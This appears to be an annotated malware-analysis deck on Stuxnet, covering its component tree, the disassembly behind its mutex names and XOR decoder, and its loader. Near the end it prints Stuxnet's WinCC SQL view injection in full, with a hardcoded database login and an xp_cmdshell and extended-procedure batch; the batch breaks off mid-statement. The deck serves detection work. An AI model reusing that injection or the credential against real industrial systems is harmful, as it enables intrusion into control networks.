Components Tree
.LNK files
~WTRxxxx.tmp dlls
Extracted/decompressed dll
MRXxxx.sys drivers
2 Embedded Wrapper.dll
Embedded .exe template
Embedded .lnk template
Embedded ~WTR4141.tmp
Embedded .cab file
Another .dll
Two .dat files
Components Breakdown
Copy of Shortcut
to.lnk
Copy of Copy of Shortcut
to.lnk
Copy of Copy of Copy of
Shortcut to.lnk
Copy of Copy of Copy of Copy of
Shortcut to.lnk
~WTR4141.tmp
~WTR4132.tmp
DLL ~1250 KB
This is the main Trojan
Many exported functions
Many embedded resources
Many capabilities
This is what we will focus on
Stuxnet timeline (PE header compile timestamps — these are written by the build tooling and trivially forgeable, so treat them as a weak indicator, not as proof of build date)
1/1/2009 10:50:28AM Stuxnet Generic PE Template
Timestamp
1/1/2009 10:53:25AM MRxcls.sys Timestamp
~WTR4141.tmp
CreateMutex name format {%08x-%08x-%08x-%08x}: each field is the current process id XORed with a fixed constant (see the disassembly below), so the mutex name differs per process and is not usable as a static indicator — but it can be regenerated from a PID and the four constants.
// Mutex-name derivation, first variant (~WTR4141.tmp).
// eax = GetCurrentProcessId(); each of the four %08x fields is eax XORed
// with a fixed constant, so the name is per-process but fully
// reproducible from the PID plus these constants.
// Resulting name (cdecl: varargs pushed right-to-left, so the value pushed
// closest to the format string is the first field):
//   {pid^0x05858AA3-pid^0x0AE48481-pid^0x05858721-pid^0x00049481}
100020A7
call dword ptr [0x10005048] // __imp_KERNEL32.dll!
GetCurrentProcessId[0000588A]
100020AD loc_100020AD:
100020AD
mov ecx,eax
100020AF
xor ecx,0x00049481 // field 4 (pushed first)
100020B5
push ecx
100020B6
mov edx,eax
100020B8
xor edx,0x05858721 // field 3
100020BE
push edx
100020BF
mov ecx,eax
100020C1
xor ecx,0x0AE48481 // field 2
100020C7
push ecx
100020C8
xor eax,0x05858AA3 // field 1 (pushed last of the four); eax itself is consumed here
100020CD
push eax
100020CE
lea edx,[esp+0x14] // edx = output buffer on the stack, just above the four pushed fields
100020D2
push 0x100054F8 // {%08x-%08x-%08x-%08x}
100020D7
push edx // buffer is the first (leftmost) argument
100020D8
call dword ptr [0x100050D8] // __imp_USER32.dll!
wsprintfW[00005AD2]
// Mutex-name derivation, second variant: same construction as the first
// (PID XOR four constants, formatted with the same {%08x-%08x-%08x-%08x}
// string at 0x100054F8) but with a different constant set, so a second,
// distinct per-process mutex name is produced.
// Resulting name (varargs pushed right-to-left):
//   {pid^0x09487481-pid^0x00040941-pid^0x05800097-pid^0x04393481}
10002137
call dword ptr [0x10005048] // __imp_KERNEL32.dll!
GetCurrentProcessId[0000588A]
1000213D loc_1000213D:
1000213D
mov ecx,eax
1000213F
xor ecx,0x04393481 // field 4 (pushed first)
10002145
push ecx
10002146
mov edx,eax
10002148
xor edx,0x05800097 // field 3
1000214E
push edx
1000214F
mov ecx,eax
10002151
xor ecx,0x00040941 // field 2
10002157
push ecx
10002158
xor eax,0x09487481 // field 1 (pushed last of the four)
1000215D
push eax
1000215E
lea edx,[esp+0x14] // edx = output buffer on the stack, just above the four pushed fields
10002162
push 0x100054F8 // {%08x-%08x-%08x-%08x}
10002167
push edx // buffer is the first (leftmost) argument
10002168
call dword ptr [0x100050D8] // __imp_USER32.dll!
wsprintfW[00005AD2]
CreateMutex: {BE3533AB-2DDC-46a1-8F7B-F102B8A5C30A} — unlike the PID-derived names above, this one appears to be a fixed string, so it is directly usable as a host-based indicator.
// Word-wise XOR decoder, key 0xAE12.
// On entry: ecx = source of encoded 16-bit words, edx = destination.
// Both pointers are advanced by 2 BEFORE the first load/store, so the word
// at the original ecx/edx is not handled here (presumably done by the
// caller or an instruction preceding this excerpt -- not visible).
// Terminates when a decoded word equals 0x0000, i.e. a wide-string style
// null terminator (the terminator itself is written before the exit).
// NOTE(review): the constant 0xAE12 together with this 16-bit xor/store
// loop is a plausible byte-pattern anchor for a signature.
loc_100036F1:
push edi // edi is used as the key register; preserved for the caller
loc_100036F2:
inc ecx
inc ecx // ecx += 2: next source word
mov ax,word ptr [ecx]
inc edx
inc edx // edx += 2: next destination word
mov edi,0xAE12 // loop-invariant key, reloaded every iteration (no behavioural effect)
xor ax,di // decode; also sets ZF when the decoded word is 0
mov word ptr [edx],ax // store; mov leaves flags untouched
jne 0x100036F2 // loc_100036F2 -- ZF still comes from the xor: loop until a 0x0000 word has been written
loc_10003706:
pop edi
loc_10003707:
ret
~WTR4132.TMP
Large DLL, custom-loaded by the first ~WTR*.tmp. It mostly consists of a UPX-packed DLL, which it extracts and loads in memory using the same kind of custom loader as the first ~WTR*.tmp rather than the standard Windows loader — so the unpacked inner DLL is expected to exist only in memory, not as a file on disk.
STUXNET.DLL
MCPTVARIABLEDESC.OSDATASIZE,
MCPTVARIABLEDESC.VARGROUPID,
MCPTVARIABLEDESC.VARXRES,
MCPTVARIABLEDESC.VARMARK,
MCPTVARIABLEDESC.SCALETYPE,
MCPTVARIABLEDESC.SCALEPARAM1,
MCPTVARIABLEDESC.SCALEPARAM2,
MCPTVARIABLEDESC.SCALEPARAM3,
MCPTVARIABLEDESC.SCALEPARAM4
from MCPTVARIABLEDESC
-- MCPVREADVARPERCON, form without any external data source: a straight
-- projection of every MCPTVARIABLEDESC column, no filter, no OPENROWSET.
-- The variant further down that begins "view MCPVREADVARPERCON as select
-- VARIABLEID,..." differs in its FROM clause, which is where the
-- openrowset(...) payload is appended.
view MCPVREADVARPERCON as
select MCPTVARIABLEDESC.VARIABLEID,
MCPTVARIABLEDESC.VARIABLETYPEID, MCPTVARIABLEDESC.FORMATFITTING,
MCPTVARIABLEDESC.SCALEID,
MCPTVARIABLEDESC.VARIABLENAME,
MCPTVARIABLEDESC.ADDRESSPARAMETER, MCPTVARIABLEDESC.PROTOKOLL,
MCPTVARIABLEDESC.MAXLIMIT,
MCPTVARIABLEDESC.MINLIMIT,
MCPTVARIABLEDESC.STARTVALUE, MCPTVARIABLEDESC.SUBSTVALUE,
MCPTVARIABLEDESC.VARFLAGS,
MCPTVARIABLEDESC.CONNECTIONID,
MCPTVARIABLEDESC.VARPROPERTY, MCPTVARIABLEDESC.CYCLETIMEID,
MCPTVARIABLEDESC.LASTCHANGE, MCPTVARIABLEDESC.ASDATASIZE,
MCPTVARIABLEDESC.OSDATASIZE, MCPTVARIABLEDESC.VARGROUPID,
MCPTVARIABLEDESC.VARXRES, MCPTVARIABLEDESC.VARMARK,
MCPTVARIABLEDESC.SCALETYPE,
MCPTVARIABLEDESC.SCALEPARAM1,
MCPTVARIABLEDESC.SCALEPARAM2,
MCPTVARIABLEDESC.SCALEPARAM3,
MCPTVARIABLEDESC.SCALEPARAM4 from MCPTVARIABLEDESC
-- MCPVREADVARPERCON, single-line form with the same column list as the
-- preceding definition and the same plain "from MCPTVARIABLEDESC".
-- (Identifiers below are wrapped mid-word by the slide extraction; the
-- text is reproduced as-is.)
view MCPVREADVARPERCON as select
MCPTVARIABLEDESC.VARIABLEID,MCPTVARIABLEDESC.VARIABLETYPEID,MCPTVARIA
BLEDESC.FORMATFITTING,MCPTVARIABLEDESC.SCALEID,MCPTVARIABLEDESC.VARIA
BLENAME,MCPTVARIABLEDESC.ADDRESSPARAMETER,MCPTVARIABLEDESC.PROTOKO
LL,MCPTVARIABLEDESC.MAXLIMIT,MCPTVARIABLEDESC.MINLIMIT,MCPTVARIABLEDES
C.STARTVALUE,MCPTVARIABLEDESC.SUBSTVALUE,MCPTVARIABLEDESC.VARFLAGS,M
CPTVARIABLEDESC.CONNECTIONID,MCPTVARIABLEDESC.VARPROPERTY,MCPTVARIA
BLEDESC.CYCLETIMEID,MCPTVARIABLEDESC.LASTCHANGE,MCPTVARIABLEDESC.ASD
ATASIZE,MCPTVARIABLEDESC.OSDATASIZE,MCPTVARIABLEDESC.VARGROUPID,MCPT
VARIABLEDESC.VARXRES,MCPTVARIABLEDESC.VARMARK,MCPTVARIABLEDESC.SCAL
ETYPE,MCPTVARIABLEDESC.SCALEPARAM1,MCPTVARIABLEDESC.SCALEPARAM2,MCP
TVARIABLEDESC.SCALEPARAM3,MCPTVARIABLEDESC.SCALEPARAM4 from
MCPTVARIABLEDESC
-- NOTE(review): the definition that follows this one keeps the column list
-- but appends to the FROM clause
--   openrowset('SQLOLEDB','Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder', ...)
-- i.e. a hardcoded WinCC SQL Server login, whose pass-through query is a
-- batch that enumerates databases named CC%, checks for
-- \GraCS\cc_tlg7.sav via xp_fileexist, runs extrac32 through
-- master..xp_cmdshell, and registers/executes an extended procedure via
-- dbcc addextendedproc(sp_run, ...). Presumably any SELECT against the
-- view then runs that batch under the WinCCConnect login (the batch is cut
-- off at the end of this excerpt). Detection: alert on any definition of
-- MCPVREADVARPERCON (or other WinCC views) containing openrowset,
-- xp_cmdshell or addextendedproc, and treat use of the
-- WinCCConnect/2WSXcder pair from a non-WinCC process as a compromise
-- indicator.
view MCPVREADVARPERCON as select
VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPA
RAMETER,PROTOKOLL,MAXLIMIT,MINLIMIT,STARTVALUE,SUBSTVALUE,VARFLAGS,CO
NNECTIONID,VARPROPERTY,CYCLETIMEID,LASTCHANGE,ASDATASIZE,OSDATASIZE,VA
RGROUPID,VARXRES,VARMARK,SCALETYPE,SCALEPARAM1,SCALEPARAM2,SCALEPAR
AM3,SCALEPARAM4 from
MCPTVARIABLEDESC,openrowset('SQLOLEDB','Server=.\WinCC;uid=WinCCConnect;
pwd=2WSXcder','select 0;declare @t varchar(999),@s varchar(999),@a int declare r
cursor for select filename from master..sysdatabases where (name like ''CC%'')
open r fetch next from r into @t while (@@fetch_status<>-1) begin set
@t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec
master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell
''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t=@t+''x'';dbcc
addextendedproc(sp_run,@t);exec master..sp_run;exec